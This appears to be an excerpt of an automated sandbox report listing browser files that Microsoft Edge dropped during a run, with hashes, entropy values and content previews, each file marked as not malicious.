                                                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-671FFBDB-1F80.pma

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.45158780974407686
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:Q7If9j1obkcHIYYy5qcJKegWaHaxZF3y:kkcoYTO
                                                                                                                                                                                                                                                                                                                                MD5:2319F980095B143FBCDE5E5DBA3FE2C4
                                                                                                                                                                                                                                                                                                                                SHA1:E65D0B16CC6694F3113DCF8A2D9DEF4250F2E72F
                                                                                                                                                                                                                                                                                                                                SHA-256:F4C2249972F76BC82121941FCA602AF6CDAB662B38EF29C766FB375DB8DE62F4
                                                                                                                                                                                                                                                                                                                                SHA-512:9C711BDA64577F45648EE1C3F3E00224FCC5071E43FFC5F2E834C4DE08C97023F423B9598ECD63C979731544DFE112FB59C5ED0380A36FAE483E2109D769273D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...................@...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".oodwbk20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2......._...... .2.........

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                                                                MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                                                                SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                                                                SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                                                                SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\02a0322d-8aaa-4832-ad55-fc412093703a.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.5613874141616515
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:Z/yYFA7pLGLpp/WPCwfRT8F1+UoAYDCx9Tuqh0VfUC9xbog/OVlIvnIyCsrwVH9Z:Z/yYFMcpp/WPCwfRTu1jakIvnhCFVH9Z
                                                                                                                                                                                                                                                                                                                                MD5:F26FBACB23CE9A11CE51B339333BD812
                                                                                                                                                                                                                                                                                                                                SHA1:8FEF970543C7D3782B81BC0CF765BAE2C1D33D4F
                                                                                                                                                                                                                                                                                                                                SHA-256:CB7DFA96276CADBA32A095A6F02971868647D943A6E0BBB639E3E58DC0CA5C85
                                                                                                                                                                                                                                                                                                                                SHA-512:01A74CAFC98B02F17F2DC79A2A698F7F998A78BE5DB4EB68A8EBADCDD79ED80E870715EC3EA8A59C6AB3E5B250DC1875D184D1E6EFCEA3F0973F10E5163A90DD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374622939649808","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374622939649808","location":5,"ma

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2b1a6afa-a39e-44b7-b568-a30e745739f4.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17632), with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):17635
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.486057932676461
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:stOPGQSu4Xsatfhei0FJ+iyD1hlDT/bGFQw96WxVlaTYP:sMOXuCtf30ebGWeBaTYP
                                                                                                                                                                                                                                                                                                                                MD5:641CB02E38F6F1DB93CD1183876F2092
                                                                                                                                                                                                                                                                                                                                SHA1:CFF2620E334355E96B6EC04A1845AD8FE809A307
                                                                                                                                                                                                                                                                                                                                SHA-256:EA0490D0C491F0BA7A6FE604BCD6857EE2DFD6CAF0341443723621CA80ED79CC
                                                                                                                                                                                                                                                                                                                                SHA-512:6E2820416AA87A86566660E55F4C94500A3ED39689CBEFEBB5512B8925AF2A00EEDE9EA0A68F682E1B814D82EA30B8B7BBA932B81F5EF76AFB7056F010B86EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3c8e2796-c2ae-409b-bf85-36351194cc3f.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):30243
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.566437382706385
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:ZSAYHA7pLGLpu/WPCwf4T8F1+UoAYDCx9Tuqh0VfUC9xbog/OVfIvCIyhsrwMk8g:ZSAYHMcpu/WPCwf4Tu1ja+IvChhFMkm4
                                                                                                                                                                                                                                                                                                                                MD5:8A92EEF98B82E232847E54DE5058C33A
                                                                                                                                                                                                                                                                                                                                SHA1:3DAF8687A67F3A0A42513F1D5A05B746062F0C3C
                                                                                                                                                                                                                                                                                                                                SHA-256:ABC8E0DA3BE390EC9F1E47E3AADCEC092499BEB89E3AA72D803959524812D130
                                                                                                                                                                                                                                                                                                                                SHA-512:BCD8ACC5A10F5A32152400AC80E734AA058976D517EF62A6E80C51221926E264DBBEA29A613578BC3D114E753336AB9AC7238E6FC5B2C3A4DA94A1CC01F7F740
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374622939649808","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374622939649808","location":5,"ma

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\82bf00f3-9dac-4db9-8930-287e9e8a83e4.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9713
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.118559250418208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:stOkdpXs2JtsZihUkegEp8wbV+FVTQA66WYaFIMYCP7YJ:stOQXsatfhG/bGFQx6WYaTYP
                                                                                                                                                                                                                                                                                                                                MD5:209922C7808AAEC3E9BE7CB0971AB4BC
                                                                                                                                                                                                                                                                                                                                SHA1:201DA534D051552C34B68F2B0F31AFF03A61B965
                                                                                                                                                                                                                                                                                                                                SHA-256:E0090F0E50F8F297230086DAA8D49116542E17724C0280D6ABCF9BD50A9FDD03
                                                                                                                                                                                                                                                                                                                                SHA-512:C3122B0CDFE0979EA61A27C25B98AEAE1B3294A4AE2D1945CBF43BF18A59FAA30AFE2825C52F7A725939617AA9A0654C923460FB22F8E267BFD7B6F946C822D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.268993819077766
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yd0RM1923oH+Tcwtp3hBtB2KLlkdkGOq2P923oH+Tcwtp3hBWsIFUv:NRhYebp3dFLgOv4Yebp3eFUv
                                                                                                                                                                                                                                                                                                                                MD5:D82BC7264CEF53962E3CBBD3ABD94F67
                                                                                                                                                                                                                                                                                                                                SHA1:1CC519F585DE2AC7A3C5A990260DD2BB51A0E99F
                                                                                                                                                                                                                                                                                                                                SHA-256:4946256C39606E849D36B888D7342A060862EAA144504B7BDFCC7E7B4836CA58
                                                                                                                                                                                                                                                                                                                                SHA-512:D401F146C26DF2D708F78C63DE6C9D02B8946C8419EE737C1F38CD465960E60DD6C01B5BD4C3B09E6FAF1956C371F8ED859F9F4215D6C9DC5BF88B7DAAB979C3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:25.479 19b4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/10/28-17:02:25.534 19b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.22287355716326
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:v+/PN8F9fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8jfx2mjF
                                                                                                                                                                                                                                                                                                                                MD5:C98634E8D74F5D2A6D183DF376636234
                                                                                                                                                                                                                                                                                                                                SHA1:E65A5E84BBD8D4AAAEBA852B5FCDC9781A780200
                                                                                                                                                                                                                                                                                                                                SHA-256:FDB177CBBCD58579264C2F9E5DADBC63AC99289CEB12AF5EBDE1F49834609557
                                                                                                                                                                                                                                                                                                                                SHA-512:78A58993EEC4698489439C21888350564E3EE4CB76D4D939344AE0C68045024267AAAA98D0EF4E24C06558EFA536DB86E5938B2477EAAE7B8F642D3E65B7E5FC
                                                                                                                                                                                                                                                                                                                                Malicious:false
